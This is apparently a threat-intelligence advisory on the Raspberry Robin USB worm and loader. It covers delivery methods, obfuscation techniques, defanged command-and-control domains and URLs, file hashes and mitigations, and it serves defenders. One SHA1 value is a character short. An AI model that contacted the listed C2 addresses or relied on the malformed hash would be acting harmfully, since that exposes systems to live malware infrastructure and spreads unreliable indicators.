Raspberry Robin Malware: USB Worm Turned Initial Access Powerhouse

Threat Group: Storm-0856 (Roshtyak)
Threat Type: Initial Access Broker (IAB), Malware Loader, USB Worm
Exploited Vulnerabilities: CVE-2023-36802, CVE-2023-29360
Malware Used: Raspberry Robin (aka Roshtyak, QNAP worm)
Threat Score: High (8.5/10) – Ongoing use by ransomware groups and Russian state-backed actors, with evolving delivery techniques and C2 infrastructure.
Last Threat Observation: March 27, 2025

Overview

Raspberry Robin, first detected in 2021, has rapidly evolved from a relatively straightforward USB worm into a full-fledged Initial Access Broker (IAB) and malware loader used by cybercriminals and nation-state actors alike. Most recently, its infrastructure has been linked to over 180 active command-and-control domains and is being used by threat groups such as LockBit, Clop, and Storm-0856 (Roshtyak)—which is tied to Russian GRU Unit 29155 (Cadet Blizzard). With a confirmed presence across thousands of corporate environments, its role in delivering secondary payloads like Cobalt Strike and Dridex escalates the risk of ransomware and espionage.

Key Details

Delivery Method: USB drives, phishing, malicious archives, WSF scripts, malvertising
Target: All sectors including finance, tech, telecom, critical infrastructure

Functions:

• Self-propagating USB worm
• Initial access broker
• Payload delivery (Cobalt Strike, Dridex, etc.)
• Payload hosting via NAS (e.g., QNAP)
• Obfuscation and anti-analysis measures

Obfuscation Techniques:

• Up to 14 layers of packing
• VM/sandbox detection
• LOLBins (e.g., msiexec, wscript)
• API hashing, COM hijacking, anti-emulation, mixed-case command lines

Attack Vectors

Raspberry Robin’s distribution began with USB-based infections using malicious .LNK files. Since 2023, its attack vectors have diversified to include:

• RAR/ZIP archives hosted on Discord CDN
• DLL sideloading
• Heavily obfuscated WSF scripts (via phishing)
• Windows LPE exploits (CVE-2023-36802, CVE-2023-29360)
• Malvertising

These developments show a high level of adaptability, allowing it to circumvent traditional detection and reach victims across various platforms.

Known Indicators of Compromise (IoCs)

File Hashes (MD5):

• 6f5ea8383bc3bd07668a7d24fe9b0828
• e8f0d33109448f877a0e532b1a27131a

SHA1:

• 90e00d25f5c9162800c02510e7e10ffa6b6ed995
• bfca72ba5095f8a108314c1c4deb5faed82ef4d

SHA256:

• 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7

Domains:

• 3h[.]wf
• 1j[.]pm
• 0dz[.]me
• v0[.]cx
• wak[.]rocks
• q2[.]rs
• m0[.]wf

URLs:

• hxxp://3h[.]wf:8080/ZgMaAJK3xTC/LP079LLP=52284
• hxxp://wak[.]rocks/gma0IIwrn55/desktop-p2jtbe1

Mitigation and Prevention

• User Awareness: Train users on USB threats and suspicious files from cloud/CDN sources.
• Email Filtering: Block .LNK, .WSF, .DLL and archive attachments in email. Use sandboxing.
• Antivirus Protection: Deploy EDR with behavior-based detections. Monitor msiexec, regsvr32, rundll32 with network behavior.
• Two-Factor Authentication (2FA): Apply across VPN, RDP, admin interfaces to limit lateral movement.
• Monitor Logs: Alert on Tor traffic, obscure TLD domains, LOLBins, registry modifications.
• Regular Updates: Prioritize CVE-2023-36802, CVE-2023-29360, and older Windows LPEs.
• USB Device Management: Disable autorun and implement scanning policies for removable media.
• Network Segmentation: Isolate critical systems and apply strict access controls.
• Threat Intelligence Sharing: Engage with sharing platforms for real-time IoC updates.

Risk Assessment

• Likelihood: High – Used by APT and cybercrime actors; frequent sightings.
• Impact: High – Leads to ransomware, espionage, or mass compromise.
• Overall Risk Rating: High

Conclusion

The Raspberry Robin malware represents a persistent and evolving threat to organizations worldwide. Its dual nature as both a self-propagating worm and a versatile malware loader, coupled with its utilization by a broad spectrum of threat actors ranging from financially motivated cybercriminals to state-sponsored groups like the Russian GRU, makes it a significant adversary. The extensive infrastructure it maintains and the adaptability of its tactics necessitate that defenders maintain rigorous detection, prevention, and incident response strategies.

Organizations must remain vigilant and continuously adapt their security postures to effectively counter this evolving threat. Prioritizing proactive threat hunting for known indicators of compromise, rapidly isolating affected systems upon detection, and consistently enforcing security policies designed to hinder lateral movement and prevent privilege escalation are crucial steps in mitigating the risk posed by Raspberry Robin.

Sources

• MITRE ATT&CK – Raspberry Robin (S1130) – https://attack.mitre.org/software/S1130/
• The Hacker News –https://thehackernews.com/2025/03/researchers-uncover-200-unique-c2.html
• HP Wolf Security Blog – https://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files/